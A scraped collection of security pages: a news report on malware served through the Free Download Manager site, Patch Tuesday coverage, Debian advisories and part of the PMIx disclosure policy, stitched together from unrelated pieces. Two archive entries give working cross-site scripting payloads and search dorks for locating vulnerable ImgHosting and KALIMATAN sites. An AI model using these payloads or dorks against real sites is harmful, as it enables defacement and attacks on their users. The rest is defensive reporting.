A download manager site served Linux users malware that stealthily stole passwords and other sensitive information for more than three years as part of a supply chain attack.
The modus operandi entailed establishing a reverse shell to an actor-controlled server and installing a Bash stealer on the compromised system. The campaign, which took place between 2020 and 2022, is no longer active.
"

A download manager site served Linux users malware that stealthily stole passwords and other sensitive information for more than three years as part of a supply chain attack.

The modus operandi entailed establishing a reverse shell to an actor-controlled server and installing a Bash stealer on the compromised system. The campaign, which took place between 2020 and 2022, is no longer active.

"This stealer collects data such as system information, browsing history, saved passwords, cryptocurrency wallet files, as well as credentials for cloud services (AWS, Google Cloud, Oracle Cloud Infrastructure, Azure)," Kaspersky researchers Georgy Kucherin and Leonid Bezvershenko said.

The website in question is freedownloadmanager\[.\]org, which, according to the Russian cybersecurity firm, offers a legitimate Linux software called "Free Download Manager," but starting in January 2020, began redirecting some users who attempted to download it to another domain deb.fdmpkg\[.\]org that served a booby-trapped Debian package.

It's suspected that the malware authors engineered the attack based on certain predefined filtering criteria (say, a digital fingerprint of the system) to selectively lead potential victims to the malicious version. The rogue redirects ended in 2022 for inexplicable reasons.

The Debian package contains a post-install script that's executed upon its installation to drop two ELF files, /var/tmp/bs and a DNS-based backdoor (/var/tmp/crond) that launches a reverse shell to a command-and-control (C2) server, which is received in response to a DNS request to one of the four domains -

*   2c9bf1811ff428ef9ec999cc7544b43950947b0f.u.fdmpkg\[.\]org
*   c6d76b1748b67fbc21ab493281dd1c7a558e3047.u.fdmpkg\[.\]org
*   0727bedf5c1f85f58337798a63812aa986448473.u.fdmpkg\[.\]org
*   c3a05f0dac05669765800471abc1fdaba15e3360.u.fdmpkg\[.\]org

"The communication protocol is, depending on the connection type, either SSL or TCP," the researchers said. "In the case of SSL, the crond backdoor launches the /var/tmp/bs executable and delegates all further communications to it. Otherwise, the reverse shell is created by the crond backdoor itself."

The ultimate goal of the attack is to deploy a stealer malware and harvest sensitive data from the system. The collection information is then uploaded to the attacker's server using an uploader binary downloaded from the C2 server.

crond, Kaspersky said, is a variant of a backdoor known as Bew that has been in circulation since 2013, while an early version of the Bash stealer malware was previously documented by Yoroi in June 2019.

UPCOMING WEBINAR

Identity is the New Endpoint: Mastering SaaS Security in the Modern Age

Dive deep into the future of SaaS security with Maor Bin, CEO of Adaptive Shield. Discover why identity is the new endpoint. Secure your spot now.

Supercharge Your Skills

It's not immediately clear how the compromise actually took place and what the end goals of the campaign were. What's evident is that not everyone who downloaded the software received the rogue package, enabling it to evade detection for years.

"While the campaign is currently inactive, this case of Free Download Manager demonstrates that it can be quite difficult to detect ongoing cyberattacks on Linux machines with the naked eye," the researchers said.

"Thus, it is essential that Linux machines, both desktop and server, are equipped with reliable and efficient security solutions."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Free Download Manager Site Compromised to Distribute Linux Malware to Users for 3+ Years

ImgHosting version 1.3 suffers from a cross site scripting vulnerability.

**ImgHosting 1.3 Cross Site Scripting**

Posted Sep 14, 2023

Authored by indoushka

ImgHosting version 1.3 suffers from a cross site scripting vulnerability.

tags | exploit, xss

SHA-256 | 8c169afaf39b32fa5c563194367feecff6f19735b337600d64caa7b0f3c6b6a3

Download | Favorite | View

**ImgHosting 1.3 Cross Site Scripting**

    ====================================================================================================================================| # Title     : ImgHosting v1.3 XSS Vulnerability                                                                                  || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 65.0(32-bit)                                               | | # Vendor    : https://codecanyon.net/user/FoxSash/?ref=FoxSash                                                                   |  | # Dork      : "ImgHosting  Programming by FoxSash"                                                                               |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use payload : ?search=<marquee><font color=lime size=32>Hacked by indoushka</font></marquee>[+] http://www.127.0.0.1/pikhostingcom/?search=<marquee><font color=lime size=32>Hacked by indoushka</font></marquee>Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (82,202)
*   Arbitrary (16,255)
*   BBS (2,859)
*   Bypass (1,744)
*   CGI (1,027)
*   Code Execution (7,302)
*   Conference (680)
*   Cracker (842)
*   CSRF (3,348)
*   DoS (23,535)
*   Encryption (2,371)
*   Exploit (52,098)
*   File Inclusion (4,228)
*   File Upload (977)
*   Firewall (821)
*   Info Disclosure (2,792)
*   Intrusion Detection (894)
*   Java (3,049)
*   JavaScript (860)
*   Kernel (6,732)
*   Local (14,499)
*   Magazine (586)
*   Overflow (12,707)
*   Perl (1,423)
*   PHP (5,153)
*   Proof of Concept (2,343)
*   Protocol (3,606)
*   Python (1,536)
*   Remote (30,859)
*   Root (3,591)
*   Rootkit (509)
*   Ruby (612)
*   Scanner (1,641)
*   Security Tool (7,897)
*   Shell (3,195)
*   Shellcode (1,216)
*   Sniffer (895)
*   Spoof (2,209)
*   SQL Injection (16,411)
*   TCP (2,407)
*   Trojan (687)
*   UDP (893)
*   Virus (666)
*   Vulnerability (31,829)
*   Web (9,695)
*   Whitepaper (3,751)
*   x86 (962)
*   XSS (17,999)
*   Other

**File Archives**

*   September 2023
*   August 2023
*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (2,005)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,925)
*   Debian (6,835)
*   Fedora (1,692)
*   FreeBSD (1,244)
*   Gentoo (4,323)
*   HPUX (879)
*   iOS (352)
*   iPhone (108)
*   IRIX (220)
*   Juniper (68)
*   Linux (46,701)
*   Mac OS X (687)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (485)
*   RedHat (13,853)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,907)
*   UNIX (9,308)
*   UnixWare (186)
*   Windows (6,585)
*   Other

ImgHosting 1.3 Cross Site Scripting

Microsoft has released software fixes to remediate 59 bugs spanning its product portfolio, including two zero-day flaws that have been actively exploited by malicious cyber actors.
Of the 59 vulnerabilities, five are rated Critical, 55 are rated Important, and one is rated Moderate in severity. The update is in addition to 35 flaws patched in the Chromium-based Edge browser since last month's

Endpoint Security / Zero Day

Microsoft has released software fixes to remediate 59 bugs spanning its product portfolio, including two zero-day flaws that have been actively exploited by malicious cyber actors.

Of the 59 vulnerabilities, five are rated Critical, 55 are rated Important, and one is rated Moderate in severity. The update is in addition to 35 flaws patched in the Chromium-based Edge browser since last month's Patch Tuesday edition, which also encompasses a fix for CVE-2023-4863, a critical heap buffer overflow flaw in the WebP image format.

The two Microsoft vulnerabilities that have come under active exploitation in real-world attacks are listed below -

*   **CVE-2023-36761** (CVSS score: 6.2) - Microsoft Word Information Disclosure Vulnerability
*   **CVE-2023-36802** (CVSS score: 7.8) - Microsoft Streaming Service Proxy Elevation of Privilege Vulnerability

"Exploiting this vulnerability could allow the disclosure of NTLM hashes," the Windows maker said in an advisory about CVE-2023-36761, stating CVE-2023-36802 could be abused by an attacker to gain SYSTEM privileges.

Exact details surrounding the nature of the exploitation or the identity of the threat actors behind the attacks are currently unknown.

"Exploitation of \[CVE-2023-36761\] is not just limited to a potential target opening a malicious Word document, as simply previewing the file can cause the exploit to trigger," Satnam Narang, senior staff research engineer at Tenable, said. Exploitation would allow for the disclosure of New Technology LAN Manager (NTLM) hashes."

"The first was CVE-2023-23397, an elevation of privilege vulnerability in Microsoft Outlook, that was disclosed in the March Patch Tuesday release."

Other vulnerabilities of note are several remote code execution flaws impacting Internet Connection Sharing (ICS), Visual Studio, 3D Builder, Azure DevOps Server, Windows MSHTML, and Microsoft Exchange Server and elevation of privilege issues in Windows Kernel, Windows GDI, Windows Common Log File System Driver, and Office, among others.

**Software Patches from Other Vendors**

Other than Microsoft, security updates have also been released by other vendors over the past few weeks to rectify several vulnerabilities, including -

*   Adobe
*   Android
*   Apache Projects
*   Apple
*   Aruba Networks
*   ASUS
*   Cisco
*   Citrix
*   Dell
*   Drupal
*   F5
*   GitLab
*   Google Chrome
*   Hitachi Energy
*   HP
*   IBM
*   Jenkins
*   Juniper Networks
*   Lenovo
*   Linux distributions Debian, Oracle Linux, Red Hat, SUSE, and Ubuntu
*   MediaTek
*   Mitsubishi Electric
*   Mozilla Firefox, Firefox ESR, and Thunderbird
*   NETGEAR
*   Notepad++
*   NVIDIA
*   Qualcomm
*   Samsung
*   SAP
*   Schneider Electric
*   Siemens
*   SolarWinds
*   Splunk
*   Spring Framework
*   Synology
*   TP-Link
*   Trend Micro
*   Veeam
*   VMware
*   Zimbra, and
*   Zoom

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Microsoft Releases Patch for Two New Actively Exploited Zero-Days Flaws

KALIMATAN GMS version 1.0.0 suffers from a cross site scripting vulnerability.

**KALIMATAN GMS 1.0.0 Cross Site Scripting**

Posted Sep 12, 2023

Authored by indoushka

KALIMATAN GMS version 1.0.0 suffers from a cross site scripting vulnerability.

tags | exploit, xss

SHA-256 | bd48e4a98638b72cd97b9bc442df28c3737e9b1208d03e5a4a7f58660e0bf243

Download | Favorite | View

**KALIMATAN GMS 1.0.0 Cross Site Scripting**

    ====================================================================================================================================| # Title     : KALIMATAN GMS V1.0.0 XSS Vulnerability                                                                             || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit)                                            | | # Vendor    : http://teppa.kaltimprov.go.id/                                                                                     |  | # Dork      : inurl:/front/grafik.php?tahun=                                                                                     |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : <script>alert(/indoushka/);</script>[+] http://Targetteppa.kaltimprovgoid/front/grafik.php?tahun=2018&bulan=%3Cscript%3Ealert(/indoushka/);%3C/script%3E Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (82,177)
*   Arbitrary (16,247)
*   BBS (2,859)
*   Bypass (1,743)
*   CGI (1,027)
*   Code Execution (7,301)
*   Conference (680)
*   Cracker (842)
*   CSRF (3,348)
*   DoS (23,519)
*   Encryption (2,371)
*   Exploit (52,086)
*   File Inclusion (4,228)
*   File Upload (977)
*   Firewall (821)
*   Info Disclosure (2,792)
*   Intrusion Detection (892)
*   Java (3,049)
*   JavaScript (860)
*   Kernel (6,732)
*   Local (14,499)
*   Magazine (586)
*   Overflow (12,704)
*   Perl (1,423)
*   PHP (5,152)
*   Proof of Concept (2,343)
*   Protocol (3,606)
*   Python (1,536)
*   Remote (30,852)
*   Root (3,590)
*   Rootkit (509)
*   Ruby (612)
*   Scanner (1,641)
*   Security Tool (7,895)
*   Shell (3,195)
*   Shellcode (1,216)
*   Sniffer (895)
*   Spoof (2,209)
*   SQL Injection (16,409)
*   TCP (2,407)
*   Trojan (687)
*   UDP (893)
*   Virus (666)
*   Vulnerability (31,825)
*   Web (9,695)
*   Whitepaper (3,751)
*   x86 (962)
*   XSS (17,994)
*   Other

**File Archives**

*   September 2023
*   August 2023
*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (2,005)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,925)
*   Debian (6,833)
*   Fedora (1,692)
*   FreeBSD (1,244)
*   Gentoo (4,323)
*   HPUX (879)
*   iOS (352)
*   iPhone (108)
*   IRIX (220)
*   Juniper (68)
*   Linux (46,676)
*   Mac OS X (686)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (485)
*   RedHat (13,841)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,896)
*   UNIX (9,306)
*   UnixWare (186)
*   Windows (6,584)
*   Other

KALIMATAN GMS 1.0.0 Cross Site Scripting

Debian Linux Security Advisory 5495-1 - Multiple vulnerabilities were discovered in frr, the FRRouting suite of internet protocols, while processing malformed requests and packets the BGP daemon may have reachable assertions, NULL pointer dereference, out-of-bounds memory access, which may lead to denial of service attack.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA256- -------------------------------------------------------------------------Debian Security Advisory DSA-5495-1                   security@debian.orghttps://www.debian.org/security/                                  Aron XuSeptember 11, 2023                    https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : frrCVE ID         : CVE-2022-36440 CVE-2022-40302 CVE-2022-40318 CVE-2022-43681                  CVE-2023-31490 CVE-2023-38802 CVE-2023-41358Debian Bug     : 1035829 1036062Brief introduction Multiple vulnerbilities were discovered in frr, the FRRouting suite ofinternet protocols, while processing malformed requests and packets the BGPdaemon may have reachable assertions, NULL pointer dereference, out-of-boundsmemory access, which may lead to denial of service attack.For the oldstable distribution (bullseye), these problems have been fixedin version 7.5.1-1.1+deb11u2.For the stable distribution (bookworm), these problems have been fixed inversion 8.4.4-1.1~deb12u1.We recommend that you upgrade your frr packages.For the detailed security status of frr please refer toits security tracker page at:https://security-tracker.debian.org/tracker/frrFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQEzBAEBCAAdFiEEhhz+aYQl/Bp4OTA7O1LKKgqv2VQFAmT+vCQACgkQO1LKKgqv2VTdlwf9Ez2k1hBPYWNge7Izunc6ovIAEeDkSLjAFYU/sEn8ehb2KQAvU27AxtxD0sYhV1XFD0y8gqQIngSgpVD+XKvclPTihS8h48Yx+C3M2e1ce5SnDytvM4AZ9w7fmaHvbysQL1QrKB4TyIr3jnikcMIWgwyzaRTmIpqryFabO44SSSe+Ysn8Mvdbh3p5Zzb9Udm/5iZWybYVO4aO0fndrq8TnfNe9uJCKd6MjUR/0Byppzmzt5lUm8PoW4wuxIgwpy9hXXCUD/ttQztKeK2FScQbz1xSNz6RdomyzDK+dVZ+BnihPUNWECweH9UAm8laSkRR1QzCOEjVGB6pcIge0IKl/w===t+W8-----END PGP SIGNATURE-----

Debian Security Advisory 5495-1

Debian Linux Security Advisory 5494-1 - Several NULL pointer dereference flaws were discovered in Mutt, a text-based mailreader supporting MIME, GPG, PGP and threading, which may result in denial of service (application crash) when viewing a specially crafted email or when composing from a specially crafted draft message.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5494-1                   security@debian.orghttps://www.debian.org/security/                     Salvatore BonaccorsoSeptember 10, 2023                    https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : muttCVE ID         : CVE-2023-4874 CVE-2023-4875Debian Bug     : 1051563Several NULL pointer dereference flaws were discovered in Mutt, atext-based mailreader supporting MIME, GPG, PGP and threading, which mayresult in denial of service (application crash) when viewing a speciallycrafted email or when composing from a specially crafted draft message.For the oldstable distribution (bullseye), these problems have been fixedin version 2.0.5-4.1+deb11u3.For the stable distribution (bookworm), these problems have been fixed inversion 2.2.9-1+deb12u1.We recommend that you upgrade your mutt packages.For the detailed security status of mutt please refer to its securitytracker page at:https://security-tracker.debian.org/tracker/muttFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmT+D8dfFIAAAAAALgAoaXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xNDz0SSRw/9FWka9wnMAzBxcNsxoGxyRD8fWiFitW/MuwDy/29mlPjW+jR1GZsl841eLX6dUHCJYveoo2yccLuj68pTeIVmv9gHh6pHazxCrnMlMq3/677wrT/mJKZZQZzhmAg27I3jUqgUyZPSkS8mXVIA9zLY0qg1Yt5OJx/TJgKdXjHf6xne7ZeCgNo+ESf9Dtx5fkYSS3yIYPOBRMRJK9kB+4ppsmy5hpSWlsWFrbulKiFEO3nwjcBA6SG6pqJONmHBp4t5Z1qgSoI5W0WgcL6BzK4Ewz/Jcnh18wCMearITnrpl4TXzeAcPK3jajzgjeUwcu2sPilkOdDq3qXdm58Y5pQDft3gjaDS2XsYuJxyLURrzU4eDAJYGiT4vl1RDPGIwon+0RY1fygtN5Nl6ybAhJ8AMp4JChzhI7RZl//5H+Im3juYymGRj2POG8jp6uQwyIcC14bvDN9/ZBjJbMqkwhtZPJy/SkteipEVK7LW7J0Hw6jMpDJfbKrttTurBwxuNYdf/NVcLu4jvPNinuxKc4UsJ62HBS8R9i+Ffa96GlHjvuUK2neKuxdhA2m//nANosFHK9Wyxg6z9MvoSHsJZY3OjLa3nOfByzTGKKDV4rf8iPqgeg1mv0IWYv0id3idQbkP65GcT1UgoNBreoO4R3JD07djIQqC1tAa5Rqmb0O7rgQ==Jqb0-----END PGP SIGNATURE-----

Debian Security Advisory 5494-1

Debian Linux Security Advisory 5492-1 - Several vulnerabilities have been discovered in the Linux kernel that may lead to a privilege escalation, denial of service or information leaks.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5492-1                   security@debian.org  
https://www.debian.org/security/                     Salvatore Bonaccorso  
September 09, 2023                    https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : linux  
CVE ID         : CVE-2023-1206 CVE-2023-1989 CVE-2023-2430 CVE-2023-2898  
                 CVE-2023-3611 CVE-2023-3772 CVE-2023-3773 CVE-2023-3776  
                 CVE-2023-3777 CVE-2023-3863 CVE-2023-4004 CVE-2023-4015  
                 CVE-2023-4128 CVE-2023-4132 CVE-2023-4147 CVE-2023-4155  
                 CVE-2023-4194 CVE-2023-4206 CVE-2023-4207 CVE-2023-4208  
                 CVE-2023-4273 CVE-2023-4569 CVE-2023-4622 CVE-2023-20588  
                 CVE-2023-34319 CVE-2023-40283

Several vulnerabilities have been discovered in the Linux kernel that  
may lead to a privilege escalation, denial of service or information  
leaks.

CVE-2023-1206

    It was discovered that the networking stack permits attackers to  
    force hash collisions in the IPv6 connection lookup table, which may  
    result in denial of service (significant increase in the cost of  
    lookups, increased CPU utilization).

CVE-2023-1989

    Zheng Wang reported a race condition in the btsdio Bluetooth adapter  
    driver that can lead to a use-after-free. An attacker able to insert  
    and remove SDIO devices can use this to cause a denial of service  
    (crash or memory corruption) or possibly to run arbitrary code in  
    the kernel.

CVE-2023-2430

    Xingyuan Mo discovered that the io_uring subsystem did not properly  
    handle locking when the target ring is configured with IOPOLL, which  
    may result in denial of service.

CVE-2023-2898

    It was discovered that missing sanitising in the f2fs file  
    system may result in denial of service if a malformed file  
    system is accessed.

CVE-2023-3611

    The TOTE Robot tool found a flaw in the Btrfs filesystem driver that  
    can lead to a use-after-free. It's unclear whether an unprivileged  
    user can exploit this.

CVE-2023-3772

    Lin Ma discovered a NULL pointer dereference flaw in the XFRM  
    subsystem which may result in denial of service.

CVE-2023-3773

    Lin Ma discovered a flaw in the the XFRM subsystem, which may result  
    in denial of service for a user with the CAP_NET_ADMIN capability in  
    any user or network namespace.

CVE-2023-3776, CVE-2023-4128, CVE-2023-4206, CVE-2023-4207, CVE-2023-4208

    It was discovered that a use-after-free in the cls_fw, cls_u32 and  
    cls_route network classifiers may result in denial of service or  
    potential local privilege escalation.

CVE-2023-3777

    Kevin Rich discovered a use-after-free in Netfilter when flushing  
    table rules, which may result in local privilege escalation for a  
    user with the CAP_NET_ADMIN capability in any user or network  
    namespace.

CVE-2023-3863

    It was discovered that a use-after-free in the NFC implementation  
    may result in denial of service, an information leak or potential  
    local privilege escalation.

CVE-2023-4004

    It was discovered that a use-after-free in Netfilter's  
    implementation of PIPAPO (PIle PAcket POlicies) may result in denial  
    of service or potential local privilege escalation for a user with  
    the CAP_NET_ADMIN capability in any user or network namespace.

CVE-2023-4015

    Kevin Rich discovered a use-after-free in Netfilter when handling  
    bound chain deactivation in certain circumstances, may result in  
    denial of service or potential local privilege escalation for a user  
    with the CAP_NET_ADMIN capability in any user or network namespace.

CVE-2023-4132

    A use-after-free in the driver for Siano SMS1xxx based MDTV  
    receivers may result in local denial of service.

CVE-2023-4147

    Kevin Rich discovered a use-after-free in Netfilter when adding a  
    rule with NFTA_RULE_CHAIN_ID, which may result in local privilege  
    escalation for a user with the CAP_NET_ADMIN capability in any user  
    or network namespace.

CVE-2023-4155

    Andy Nguyen discovered a flaw in the KVM subsystem allowing a KVM  
    guest using EV-ES or SEV-SNP to cause a denial of service.

CVE-2023-4194

    A type confusion in the implementation of TUN/TAP network devices  
    may allow a local user to bypass network filters.

CVE-2023-4273

    Maxim Suhanov discovered a stack overflow in the exFAT driver, which  
    may result in local denial of service via a malformed file system.

CVE-2023-4569

    lonial con discovered flaw in the Netfilter subsystem, which may  
    allow a local attacher to cause a double-deactivations of catchall  
    elements, which results in a memory leak.

CVE-2023-4622

    Bing-Jhong Billy Jheng discovered a use-after-free within the Unix  
    domain sockets component, which may result in local privilege  
    escalation.

CVE-2023-20588

    Jana Hofmann, Emanuele Vannacci, Cedric Fournet, Boris Koepf and  
    Oleksii Oleksenko discovered that on some AMD CPUs with the Zen1  
    micro architecture an integer division by zero may leave stale  
    quotient data from a previous division, resulting in a potential  
    leak of sensitive data.

CVE-2023-34319

    Ross Lagerwall discovered a buffer overrun in Xen's netback driver  
    which may allow a Xen guest to cause denial of service to the  
    virtualisation host my sending malformed packets.

CVE-2023-40283

    A use-after-free was discovered in Bluetooth L2CAP socket handling.

For the stable distribution (bookworm), these problems have been fixed in  
version 6.1.52-1. This update is released without armel builds. Changes  
in the new stable series import cause a substantial increase of the  
compressed image for marvell flavour. This issue will be addressed in a  
future linux update.

We recommend that you upgrade your linux packages.

For the detailed security status of linux please refer to its security  
tracker page at:  
https://security-tracker.debian.org/tracker/linux

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmT85fRfFIAAAAAALgAo  
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2  
NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xND  
z0TRNA/5AcjodSsYf3Z7EY00Hl9jfs69RGy9Oq9HpKsTgJhDttqwKw1h3IFLXUxz  
6KzrtjCi9NGu6REnBBN9Utgz/aHPZL4KmzyQ78U4p7j3FF8b8cNyyNk2fMtxCGg9  
T5/sq3SfH5N7lV3s/3aOelAi+DXfmxhyWYDxFVxkLWCvRx1xuJ6ShmtIE/virqXh  
lJhvVXjbujvIcStfQYnikrsC18kbNqNZjgBsdNc8qs7PiWhYtt+Xn5nFZTfYmAbr  
haixcnUG0Y59WtLg7WHdy1w2YgyrDxW+bDZLCF1ZELm+DbmQFfM9KXovfcv54AnO  
UG1PkGyCF5WKaBJDWIPHz7YCXOCkOu4WXE/oRm0tKD6ZyaXgZGfYaQulgSX20qEg  
xPDWWG6DOME4SO0F9OW3+MWr8AtvBdCLr2lTs/LW452GiMFgcVUSyydQwUDNQpDb  
YksIh3OLz3v+7e87GCQhMoxupsxMqN4Lej+knfDs170V8I3DIz+/RpTPQfesOnOk  
YOG/90+exSu0tCVAn0sh4y9Keyl6SAc7nITmSIWnsXxi0VyG3wisgDqfauMNm9Ux  
87naYV2jjOc16BACVMMQQYo+1Kpqldrb0TXF7QT+ZQF/hrNXozgxlYcTDGj5AlAP  
dhOA0Pa2onTFFNrTFiuWb1eTl8EgPGwpy1NIwEDyRul+YR/tCCs=  
=Ulr4  
-----END PGP SIGNATURE-----

Debian Security Advisory 5492-1

Debian Linux Security Advisory 5943-1 - Two security issues have been discovered in the Open VMware Tools, which may result in a man-in-the-middle attack or authentication bypass.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5493-1                   security@debian.org  
https://www.debian.org/security/                       Moritz Muehlenhoff  
September 10, 2023                    https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : open-vm-tools  
CVE ID         : CVE-2023-20867 CVE-2023-20900  
Debian Bug     : 1050970

Two security issues have been discovered in the Open VMware Tools, which  
may result in a man-in-the-middle attack or authentication bypass.

For the oldstable distribution (bullseye), these problems have been fixed  
in version 2:11.2.5-2+deb11u2.

For the stable distribution (bookworm), these problems have been fixed in  
version 2:12.2.0-1+deb12u1.

We recommend that you upgrade your open-vm-tools packages.

For the detailed security status of open-vm-tools please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/open-vm-tools

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmT+AygACgkQEMKTtsN8  
TjbAdQ/+M8tP/Dv5EOKhkUxZPD2NzBajQdr4iBJa2ZEhnhL3plaon0YNlnKcbItv  
tS1S/u3Gp33TgJ6LfpRyQ18x2/5qloPcxVER5I5j4mkkHrdPKgzx+1dirRuz5oBJ  
5FwQXWZoH3KJ6pGIc0EcNSrAEKgOqr0ISHAQ8LztXD3Oe6mtm6oxqmf24iYUmDwH  
MkAXihLOqETkz0Y0Cmn5QGUq7nUvV+at6zij+Su5fSyyyMo0WW9LZrGfNzL9t3QT  
rRl9VS/p8DRYIk6VBaF8foY1e7WfDXtiZXAVtAd53FFrSVPFlQWI9WETIDQqEGe6  
m1isNBK+kCOKCKiceLRMvX+2qUy/KKJqyRYN/VZTMqxDDVZIuY6C0kJLaZ6P5png  
svwDF0PISIq77AM/S4bw5wKbIT8qNj8BCsrkRXeXFteoTtvygAr3rnWgv3nmLY9c  
XFXIBtDhs0TS/C4ZPAhZGqAf5AJ9AN636Wie5pmUxqjnf6ecGORKfiaT5GV0URjC  
324IxAHh6ml0JcVKsUczxP7YjPlEP0LZ90tiUXYgLxQgBouTrBqOD1VdcNtZbvkz  
EYU3YDTCG7GNE3mod8COJV2ZdSAgi1V1by7j6gFDwSQrfkqUke5yLlYayQp90WPC  
oXGRR8ygOrTtRw70WQfVgWBqss0Ix1J0qnuIjrIZzhvkc8KGYeY=  
=+jTU  
-----END PGP SIGNATURE-----

Debian Security Advisory 5943-1

OpenPMIx PMIx before 4.2.6 and 5.0.x before 5.0.1 allows attackers to obtain ownership of arbitrary files via a race condition during execution of library code with UID 0.

Historically, PMIx has operated as a library at the user level in relatively controlled environments (i.e., the typical high-performance computing cluster embedded in a protected network, and thus not exposed to the general Internet). This situation has changed, however, as system management stack packages and other software operating at privileged levels have begun to operate PMIx servers. Increasingly, the PMIx library finds itself in situations where its communications are between entities at different privilege levels (e.g., between root and user) and operating on head nodes with direct connection to more exposed networks.

The PMIx community takes security associated with use of its library seriously, recognizing that our ability to respond to concerns is bound by our limited access to volunteer resources. We deeply appreciate coordinated efforts done in partnership with our reporters as these have the highest probability for a successful and satisfactory resolution. Reports that simply state something is wrong while providing no assistance in triaging the problem or developing the solution will be treated seriously, but with correspondingly longer response times.

PMIx does not have formal, contractual relationships with its users. Instead, we have informal relationships with downstream packagers (e.g., Debian, Fedora, SUSE), resource managers (e.g., Slurm, PBS, PALS), and libraries (e.g., Open MPI, MPICH, OpenSHMEM, PGAS). This quite frequently takes the form of individuals as opposed to organizational contacts. Thus, it isn’t possible for the PMIx community to offer any guarantees as to the breadth or immediacy of notification for security issues. We can only do our best to alert the people we know about, and hope that they spread the word as required.

Our vulnerability disclosure process reflects this situation. While we strongly encourage discoverers to report potential security issues to us and follow our process, we will respect their wishes and work with them in cases where their preferred process may vary.

NOTE: any potential security issue should be reported immediately to us at security@pmix.org

**14.1. Vulnerability Disclosure Process**

This process covers security issues pertaining to the PMIx library itself. Issues with closely related components — such as libevent, HWLOC, MUNGE or third-party plugins — may be raised with us and we will work with the reporter to identify the appropriate contacts and coordinate disclosure.

The PMIx Vulnerability Disclosure Process consists of several distinct, but possibly overlapping steps:

1.  Problem identification and initial triage.
    
    The problem is reported to the community and a first-level triage performed. Primary focus here is on scoping the extent of the issue so it can properly be communicated (both in terms of severity and complexity to address) to the rest of the community.
    
2.  Notification and embargo
    
    Once the problem has been triaged, it will be communicated to the known consumers of the PMIx library (as noted above). This will be done in a private manner and all informed will be asked to maintain that privacy during the embargo period. The purpose of this step is to ensure the timely notification of the problem without alerting potential bad players as to the vulnerability, thus giving the community time to respond to the problem. The community will use this period to assemble a team to address the problem.
    
    The embargo period is expected to continue during the entire time work is being performed towards a resolution of the problem. The PMIx community, of course, has no control over the actions of its members or users, and therefore cannot guarantee confidentiality throughout the resolution process. However, the community will request best efforts from all involved due to the shared interest.
    
3.  Private release
    
    Once a solution to the problem has been devised, a new release of the library will be made that includes the fix. This will first be made available to the known consumers of the library, as well as the initial reporter if not a member of that list. A reasonable amount of time will be provided (as defined by general discussion across the involved parties) for rollout to occur through the participants. The embargo on public discussion will be maintained throughout this step.
    
4.  General release
    
